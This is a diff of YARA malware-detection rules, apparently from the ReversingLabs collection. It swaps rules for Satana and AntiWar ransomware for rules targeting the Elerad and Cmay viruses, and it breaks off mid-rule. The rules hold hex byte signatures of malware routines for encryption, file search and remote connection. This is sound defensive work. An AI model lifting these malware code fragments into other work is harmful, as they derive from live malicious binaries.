 		date = "2020-07-15"
 		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Satana.yara#L1-L123"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "5deb6ac2e8b64fb6f7af8c41a9b9e695668ca66c96c65f0c7350b11cd4ae0c50"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/virus/Win32.Virus.Elerad.yara#L3-L33"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "930594bf99daf55ef02542ce7b393c1c23ead75946b3da3b555102a2e7142e33"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Satana"
+		tc_detection_type = "Virus"
+		tc_detection_name = "Elerad"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$encrypt_files_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ??
-            ?? 83 EC ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 56 57 89 65 ?? C7 45 ?? ?? ?? ?? ?? 66
-            0F 57 C0 66 0F 13 45 ?? 68 ?? ?? ?? ?? 8B 75 ?? 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 90
-            6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B F8 89
-            7D ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 57 FF 15 ?? ?? ?? ?? 8B 75 ?? 89 75 ??
-            8B 5D ?? 89 5D ?? 83 FE ?? 75 ?? 85 DB 0F 84 ?? ?? ?? ?? 8B CE 0B CB 0F 84 ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 53 56 E8 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? 33 C9
-            03 C6 13 CB 83 E8 ?? 89 45 ?? 83 D9 ?? 89 4D ?? 6A ?? 8B 55 ?? 52 6A ?? 6A ?? 6A ??
-            57 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ??
-            ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 89 45 ?? 8B 4D ?? 89 4D ?? 6A ?? FF 15 ??
-            ?? ?? ?? 83 C4 ?? 8B F0 66 0F 57 C0 66 0F 13 45 ?? 8B 5D ?? 8B 7D ?? 90 83 7D ?? ??
-            0F 8C ?? ?? ?? ?? 7F ?? 83 7D ?? ?? 0F 86 ?? ?? ?? ?? 8B D3 83 C2 ?? 8B 75 ?? 8B CE
-            83 D1 ?? 8B 45 ?? 3B C8 7F ?? 7C ?? 3B 55 ?? 77 ?? BF ?? ?? ?? ?? 33 C0 8B 75 ?? 03
-        }
-		$encrypt_files_p2 = {
-            F3 8B DA 89 4D ?? EB ?? 8B 7D ?? 2B FB 1B C6 8B 55 ?? 8D 34 13 03 DF 11 45 ?? 89 5D
-            ?? 89 45 ?? 89 7D ?? 83 7D ?? ?? 7F ?? 7C ?? 83 7D ?? ?? 73 ?? 8B 4D ?? 89 4D ?? 83
-            F9 ?? 7D ?? C6 04 31 ?? 41 EB ?? 29 7D ?? 19 45 ?? 33 C0 89 45 ?? 83 F8 ?? 7D ?? 8B
-            0C 85 ?? ?? ?? ?? 31 0C 86 40 EB ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 85 C0 74
-            ?? 88 04 37 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 01
-            0D ?? ?? ?? ?? 8B 55 ?? 11 15 ?? ?? ?? ?? 8B 45 ?? 50 8B 0D ?? ?? ?? ?? 51 68 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 7D ?? EB ?? 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 FF
-            15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? FF 15 ?? ?? ?? ?? 50
-            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B
-            4D ?? 8D 95 ?? ?? ?? ?? 0F B7 01 66 89 02 83 C1 ?? 83 C2 ?? 66 85 C0 75 ?? 6A ?? 8D
-            95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 C4 ?? 83 C0 ?? 74 ?? 8B D0 8D B5 ?? ?? ?? ??
-            0F B7 0A 66 89 0E 83 C2 ?? 83 C6 ?? 66 85 C9 75 ?? 33 C9 66 89 08 8D 95 ?? ?? ?? ??
-            52 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ??
-            ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF
-            15 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? EB ?? B8 ?? ?? ?? ?? C3 8B 65 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8
-        }
-		$search_files_p1 = {
-            E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 33 D2 56 50 66 89 94 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 33 C9 56 52
-            66 89 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 56 50 89
-            74 24 ?? E8 ?? ?? ?? ?? 8B 7D ?? 83 C4 ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? ?? 52 68
-            ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? 8D 94 24 ?? ?? ?? ?? 8B C7 2B D7 8D 9B ?? ?? ?? ?? 0F B7 08 66 89 0C 02 83 C0
-            ?? 66 3B CE 75 ?? 8D 84 24 ?? ?? ?? ?? 83 C0 ?? 8D A4 24 ?? ?? ?? ?? 66 8B 48 ?? 83
-            C0 ?? 66 3B CE 75 ?? 8B 0D ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 89 08 66 8B 0D ?? ?? ?? ??
-            89 50 ?? 68 ?? ?? ?? ?? 66 89 48 ?? FF 15 ?? ?? ?? ?? 8D 54 24 ?? 52 8D 84 24 ?? ??
-            ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 75 ?? 68 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5F 5E 5B 8B E5
-            5D C2 ?? ?? 8D A4 24 ?? ?? ?? ?? 8B 7D ?? 8B 35 ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 68 ??
-            ?? ?? ?? 51 FF D6 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 54 24 ?? 68 ?? ?? ?? ??
-            52 FF D6 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? F6 44 24 ?? ?? 0F 85 ?? ?? ?? ?? 8D 44 24
-            ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 0F 84 ?? ?? ?? ?? 66 83 3D ?? ??
-            ?? ?? ?? BF ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B C7 8D 50 ?? EB ?? 8D 9B ?? ?? ?? ?? 66
-            8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 8B CB D1 F8 8D 71 ?? 66 8B 11 83 C1 ?? 66 85 D2
+		$elerad_body = {
+            EB 77 60 E8 09 00 00 00 8B 64 24 08 E9 DD 01 00 00 33 D2 64 FF 32 64 89 22 50 8B D8 B9 FF 00 00 00 81 38 2E 65 78 65 74
+            08 40 E2 F5 E9 BD 01 00 00 32 D2 38 50 04 0F 85 B2 01 00 00 33 D2 80 38 5C 74 07 3B C3 74 07 48 E2 F4 88 10 8B D0 58 BE
+            00 00 E6 77 BF 23 C1 AB 00 EB 3E 60 E8 09 00 00 00 8B 64 24 08 E9 84 01 00 00 33 D2 64 FF 32 64 89 22 BE 00 00 E6 77 EB
+            20 68 ?? ?? ?? ?? 60 8B 74 24 24 E8 09 00 00 00 8B 64 24 08 E9 5D 01 00 00 33 D2 64 FF 32 64 89 22 E8 00 00 00 00 5D 81
+            ED ?? ?? ?? ?? 81 FF 23 C1 AB 00 75 0C 89 95 22 12 40 00 89 85 1E 12 40 00 BA ?? ?? ?? ?? B9 09 02 00 00 8D 85 D0 10 40
+            00 31 10 83 C0 04 E2 F9
         }
-		$search_files_p2 = {
-            75 ?? 2B CE D1 F9 3B C1 75 ?? 53 57 FF 15 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 66 8B 0F
-            83 C7 ?? 66 85 C9 75 ?? 66 39 0F 75 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 64 8B 15 ?? ?? ?? ?? 8B 32 8B 55 ?? 83 C4 ?? 8D 4C 24 ?? 51 52 68 ?? ?? ?? ?? 50
-            89 46 ?? FF 15 ?? ?? ?? ?? 8B 46 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 85
-            C0 0F 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 83 F8 ?? 7D ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            8B 4E ?? 6A ?? 6A ?? 51 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 15 ?? ?? ??
-            ?? 89 04 95 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 0C 85 ?? ?? ?? ?? 6A ?? 51 FF 15 ?? ?? ??
-            ?? E9 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF
-            D3 8B F8 6A ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? 8B 56 ?? 6A ?? 6A ?? 52 68 ?? ?? ?? ?? 6A ?? 6A ?? FF D3 8B 0D ?? ?? ?? ?? 89
-            04 8D ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 04 95 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ??
-            E9 ?? ?? ?? ?? 8D 4C 24 ?? 51 57 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 FF 15 ?? ??
-            ?? ?? A1 ?? ?? ?? ?? 48 50 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 FF D6 83 C4 ?? 85
-            C0 0F 84 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 75 ?? 8D 9B ?? ?? ?? ?? 0F B7 8C 04 ?? ?? ?? ?? 66 89 8C 04 ?? ?? ?? ?? 83
-            C0 ?? 66 85 C9 75 ?? 8D BC 24 ?? ?? ?? ?? 83 C7 ?? 66 8B 47 ?? 83 C7 ?? 66 85 C0 75
-            ?? 6A ?? 8D 84 24 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BE ?? ?? ?? ?? 68 ?? ?? ?? ?? F3 A5
-            FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 44 24 ?? 8D 54 24 ?? 52
-            50 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 74 24 ?? 56 FF 15
-      }
-		$remote_connection = {
-            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 56 57 E8 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B 45 ?? 8B 0D ?? ?? ?? ?? 0F B6 15 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 3D ??
-            ?? ?? ?? 8D 70 ?? 8B 00 56 68 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 52 0F B7 15 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 52 8B 15 ?? ?? ?? ?? 51 52 50
-            6A ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 FF D7 83 C4 ?? 80 3E ?? 74 ?? B9 ?? ?? ??
-            ?? 8B C6 EB ?? 8D 49 ?? C6 00 ?? 40 49 75 ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? 8D 50 ?? 8D 49 ?? 8A 08 40 84 C9 75 ?? 8D 8D ?? ?? ?? ?? 51 2B C2
-            50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 FF D7 8D 85 ??
-            ?? ?? ?? 83 C4 ?? 8D 50 ?? 8A 08 40 84 C9 75 ?? 6A ?? 2B C2 50 8D 85 ?? ?? ?? ?? 50
-            53 FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 9B ?? ?? ?? ?? C6 00 ?? 40
-            49 75 ?? 53 FF 15 ?? ?? ?? ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C2
-      }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $remote_connection and ( all of ( $search_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) )
+		uint16( 0 ) == 0x5A4D and ( $elerad_body at pe.entry_point )
 }
-rule REVERSINGLABS_Win64_Ransomware_Antiwar : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Win32_Virus_Cmay : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects AntiWar ransomware."
+		description = "Yara rule that detects Cmay virus."
 		author = "ReversingLabs"
-		id = "3113ec26-e149-527b-9478-4dd86c7fa464"
-		date = "2022-04-21"
-		modified = "2022-04-21"
+		id = "d61e09f1-1d3f-5e1e-9884-25f1a465e88d"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win64.Ransomware.AntiWar.yara#L1-L146"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2d885f35454aaf7cb33f03c30b6681aa16cbe8353003bbae0b1e9fdecb2ff8a7"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/virus/Win32.Virus.Cmay.yara#L3-L73"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f3bdf772eb80c632a913621732d12ae4a02bc7d3ba41f51711aa329be2ca6220"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "AntiWar"
+		tc_detection_type = "Virus"
+		tc_detection_name = "Cmay"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$find_files_p1 = {
-            49 8B D7 49 8B CD FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ??
-            48 8D 95 ?? ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ?? 4C 8B F0 48 89 44 24 ?? 48 83 F8 ??
-            0F 84 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? 41 8B DC 48 8D 3D ?? ?? ?? ?? 66 90 48 8B 0F
-            E8 ?? ?? ?? ?? 48 8B D0 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
-            ?? FF C3 48 83 C7 ?? 83 FB ?? 72 ?? 49 8B D7 49 8B CD FF 15 ?? ?? ?? ?? 48 8D 15 ??
-            ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ??
-            F6 85 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 66 0F 6F 35 ?? ?? 03 00 66 0F 6F 3D ?? ?? 03
-            00 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 C7 85 ?? ?? 00 00 ?? ?? 8B 05 ?? ?? ?? ?? 4C 8D
-            3C C5 ?? ?? ?? ?? 41 BC ?? ?? ?? ?? 65 48 8B 04 25 ?? ?? ?? ?? 4A 8B 0C 38 41 8B 04
-            0C 39 05 ?? ?? ?? ?? 7E ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ??
-            75 ?? C6 05 ?? ?? ?? ?? ?? 0F 11 35 ?? ?? ?? ?? 0F 11 3D ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 89 05 ?? ?? ?? ?? 0F B7 85 ?? ?? ?? ?? 66 89 05 ?? ?? 04 00 48 8D 0D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 74 ?? 45 33
-            C9 41 BA ?? ?? ?? ?? 4C 8D 35 ?? ?? ?? ?? 4D 2B D6 49 BB ?? ?? ?? ?? ?? ?? ?? ?? 66
-            66 0F 1F 84 00 ?? ?? 00 00 4B 8D 14 31 41 0F B6 C9 80 E1 ?? C0 E1 ?? 49 8B C3 48 D3
-        }
-		$find_files_p2 = {
-            E8 30 02 4C 8D 42 ?? 41 8D 0C 12 80 E1 ?? C0 E1 ?? 49 8B D3 48 D3 EA 41 30 10 49 83
-            C1 ?? 49 83 F9 ?? 72 ?? 4C 8B 74 24 ?? C6 05 ?? ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 48 8B D0 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
-            48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 E8 ?? 48 63 C8 78 ?? 0F 1F 40 ?? 66 83 BC
-            4D ?? ?? 00 00 ?? 74 ?? FF C8 48 83 E9 ?? 79 ?? EB ?? B3 ?? 48 98 4C 8D B5 ?? ?? ??
-            ?? 4D 8D 34 46 48 8D 3D ?? ?? ?? ?? BE ?? ?? ?? ?? 45 33 ED 48 8B 0F E8 ?? ?? ?? ??
-            48 8B D0 49 8B CE FF 15 ?? ?? ?? ?? 0F B6 DB 85 C0 41 0F 44 DD 48 8D 7F ?? 48 83 EE
-            ?? 75 ?? 4C 8B 6C 24 ?? 4C 8B 74 24 ?? 84 DB 0F 84 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ??
-            45 33 C0 49 8B D5 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 FF
-            90 89 BD ?? ?? ?? ?? 4C 8D 85 ?? ?? ?? ?? 33 D2 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            48 8B D8 48 85 C0 0F 84 ?? ?? ?? ?? 66 0F 1F 84 00 ?? ?? 00 00 83 3D ?? ?? ?? ?? ??
-            0F 84 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 85 C9 0F 84 ?? ?? ?? ?? 83 79 ?? ?? 0F 8C
-            ?? ?? ?? ?? 66 0F 6F 35 ?? ?? 03 00 66 0F 6F 3D ?? ?? 03 00 66 C7 85 ?? ?? 00 00 ??
-            ?? 65 48 8B 04 25 ?? ?? ?? ?? 4A 8B 0C 38 41 8B 04 0C 39 05 ?? ?? ?? ?? 7E ?? 48 8D
-            0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ?? C6 05 ?? ?? ?? ?? ?? 0F 11
-            35 ?? ?? ?? ?? 0F 11 3D ?? ?? ?? ?? 0F B7 85 ?? ?? ?? ?? 66 89 05 ?? ?? 04 00 48 8D
-        }
-		$find_files_p3 = {
-            0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D ?? ?? ?? ??
-            ?? 74 ?? 48 8B C7 41 BA ?? ?? ?? ?? 4C 8D 35 ?? ?? ?? ?? 4D 2B D6 49 BB ?? ?? ?? ??
-            ?? ?? ?? ?? 90 4E 8D 0C 30 0F B6 C8 80 E1 ?? C0 E1 ?? 4D 8B C3 49 D3 E8 45 30 01 43
-            8D 0C 11 80 E1 ?? C0 E1 ?? 49 8B D3 48 D3 EA 41 30 51 ?? 48 83 C0 ?? 48 83 F8 ?? 72
-            ?? 4C 8B 74 24 ?? C6 05 ?? ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? C7 44 24
-            ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? 48 89 7D ?? 48 C7 45 ?? ?? ?? ?? ?? BA
-            ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ??
-            ?? ?? ?? 48 89 85 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 48 C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? 66 89 BD ?? ?? 00 00 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 48 8D 15 ?? ?? ?? ??
-            48 8D 4D ?? E8 ?? ?? ?? ?? 48 8B D6 48 85 DB 48 0F 45 D3 48 8D 4D ?? E8 ?? ?? ?? ??
-            48 8B 3D ?? ?? ?? ?? 48 8B 5F ?? 48 3B 5F ?? 74 ?? 0F 1F 84 00 ?? ?? ?? ?? 48 8B 0B
-        }
-		$find_files_p4 = {
-            48 8B 01 48 8D 54 24 ?? FF 50 ?? 48 83 C3 ?? 48 3B 5F ?? 75 ?? 48 8D 05 ?? ?? ?? ??
-            48 89 44 24 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 83 FA ??
-            72 ?? 48 FF C2 48 8B 8D ?? ?? ?? ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ??
-            48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 FF
-            48 89 BD ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 40 88 BD ?? ?? ?? ?? 48 8D 4D
-            ?? E8 ?? ?? ?? ?? EB ?? 48 8B CB E8 ?? ?? ?? ?? 48 8B CB E8 ?? ?? ?? ?? 4C 8D 85 ??
-            ?? ?? ?? 33 D2 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D8 48 85 C0 0F 85 ?? ?? ??
-            ?? 45 33 C0 49 8B D5 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 45
-            33 E4 4C 8B 7C 24 ?? 48 8D 95 ?? ?? ?? ?? 49 8B CE FF 15 ?? ?? ?? ?? 85 C0
-        }
-		$enum_shares = {
-            48 83 EC ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 44 24 ?? 33 D2 C7 44 24 ?? ?? ?? ??
-            ?? 48 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 4C 8B C9 48 89 44 24 ?? 8D 4A ?? 44 8D 42
-            ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 4C 24 ?? 48 89 7C 24 ?? E8 ?? ?? ?? ??
-            48 8B F8 48 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4C 24 ?? 4C 8D 4C 24 ?? 4C 8B C0 48 8D 54
-            24 ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 48 89 5C 24 ?? 33 DB 39 5C 24 ?? 76 ?? 0F 1F 84 00
-            ?? ?? ?? ?? 48 8D 0C 5B 48 C1 E1 ?? 48 03 CF F6 41 ?? ?? 74 ?? E8 ?? ?? ?? ?? EB ??
-            48 8B 49 ?? E8 ?? ?? ?? ?? FF C3 3B 5C 24 ?? 72 ?? 48 8B 4C 24 ?? 4C 8D 4C 24 ?? 4C
-            8B C7 48 8D 54 24 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 5C 24 ?? 48 8B CF E8 ?? ?? ??
-            ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 48 8B 4C 24 ?? 48 33 CC E8 ?? ?? ??
-            ?? 48 83 C4 ?? C3
-        }
-		$encrypt_files_p1 = {
-            48 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 45 33 C9 45 33 C0 BA
-            ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 4C 8B F0 48 8B 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 49 83 FE ?? 0F 84 ?? ?? ?? ?? 41 BD ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 49
-            8B CE FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8B F8 48 85 C0 0F 84 ?? ??
-            ?? ?? 4C 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 80
-            A5 ?? ?? ?? ?? ?? 0F B6 8D ?? ?? ?? ?? 80 E1 ?? 80 C9 ?? 88 8D ?? ?? ?? ?? 4C 8D 85
-            ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 05 ?? ??
-            ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 85 ?? ?? ?? ??
-            BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 45 8B C1 48 8D
-            95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ??
-            ?? ?? ?? 33 D2 44 8D 42 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2 44 8D 42 ?? 48
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2 44 8D 42 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 48 8B DE 45 33 C9 45 33 C0 48 8B D6 49 8B CE FF 15 ?? ?? ?? ?? 48 8B 8D ?? ?? ??
-            ?? 48 81 F9 ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 F7 E9 48
+		$cmay_body_1 = {
+            60 66 9C E8 00 00 00 00 5D 8B C5 81 ED ?? ?? ?? ?? 2D 08 00 00 00 2D
+            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 3A 02 00 00 0F 82 7C 03 00 00 8D B5
+            ?? ?? ?? ?? 8D BD ?? ?? ?? ?? E8 4F 02 00 00 E8 05 00 00 00 E9 61 03
+            00 00 8D BD ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 03 6A 7F 57 FF 95 ?? ?? ??
